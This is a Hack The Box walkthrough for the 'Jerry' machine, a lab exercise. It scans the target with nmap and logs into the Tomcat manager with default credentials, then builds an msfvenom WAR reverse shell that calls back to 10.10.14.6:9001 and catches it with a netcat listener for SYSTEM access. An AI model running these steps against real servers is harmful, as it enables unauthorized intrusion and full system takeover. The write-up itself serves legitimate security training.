Jerry HTB

10.10.10.95

Initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.95 | cut -d"/" -f1 | tr '\n' ','

we can see we have the following port open on the target server

8080

Lets get some more details on this port

sudo nmap -sCV -p8080 10.10.10.95 -oA nmap_results

reults

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1

We can see apache tomcat is running on the target

version 7.0.88

Lets check it out

HTTP Port 8080

navigating to http://10.10.10.95:8080 we can confirm Apache Tomcat version 7.0.88 is indeed running

Let's see if we access the /manager directory

we are granted with a login request

we try the following

admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
admin:tomcat

But no luck when but we are bought to this error page

we can see a set of credentials in the example window

tomcat: s3cret

Lets see if these work

and it does we are bought to the application manager

Since we can upload .war files we should be able to upload a reverse shell onto the target server and gain access

first lets generate a reverseshell to upload

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f war -o shell.war

start a listener

rlwrap -cAr nc -lvnp 9001

Now lets upload the file

Now when we navigate to `http://10.10.10.95:8080/shell`

we should have a hit on our listener

as you can see we are nt authority\system we owned the system

PreviousLegacy NextSilo HTB

Last updated 2 years ago